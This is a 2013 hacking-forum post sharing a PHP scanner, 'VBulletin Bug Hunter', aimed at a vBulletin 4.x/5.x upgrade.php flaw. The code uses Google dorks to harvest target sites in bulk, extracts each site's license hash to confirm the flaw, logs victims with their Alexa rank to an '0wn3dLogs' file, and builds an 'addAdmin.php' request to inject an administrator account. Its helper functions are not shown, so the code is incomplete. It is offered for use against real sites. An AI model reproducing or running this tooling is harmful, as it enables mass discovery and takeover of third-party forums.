Versus71 Posted September 24, 2013 Share Posted September 24, 2013 (edited) VBulletin Bug Hunter[For VBulletin 4.x & 5.x (upgrade.php) Bug]Note: the bug was found by somebody else Google Dork: <?php if(isset($_POST['dork']{0})) { $file = fopen("0wn3dLogs.txt","a"); echo ' Scanning has been started... Good luck! ;)'; letItBy(); for($googlePage = 1; $googlePage <= 50; $googlePage++) { $googleResult = google_that($_POST['dork'], $googlePage); if(!$googleResult) { echo 'Finished scanning.'; fclose($file); break; } for($victim = 0; $victim < sizeof($googleResult); $victim++){ $hash = check_vuln($googleResult[$victim]['unescapedUrl']); $alexa = getAlexa($googleResult[$victim]['unescapedUrl']); echo "Currently checking..."; if(strlen($hash) == 32){ $line = $googleResult[$victim]['unescapedUrl'] . " | " . $hash . " | " . $alexa . "\n"; fwrite($file,$line); echo ''; echo "SITE: {$googleResult[$victim]['titleNoFormatting']} - VULNERABLE\n"; echo "VB license MD5 HASH: " . $hash; echo " - Alexa Rank = " . $alexa; $sendURL = "addAdmin.php?customerid=".$hash."&url=".$victimURL; echo ' - Inject Admin'; echo ""; } else { echo ''; echo "{$googleResult[$victim]['titleNoFormatting']} - NOT VULNERABLE"; if($alexa <= 50000) echo " - " . $alexa; echo "\n"; } letItBy(); } } echo ''; }?>Coded by g00n.Greets: Xploiter.net Edited September 24, 2013 by Versus71 Link to comment Share on other sites More sharing options...
Recommended Posts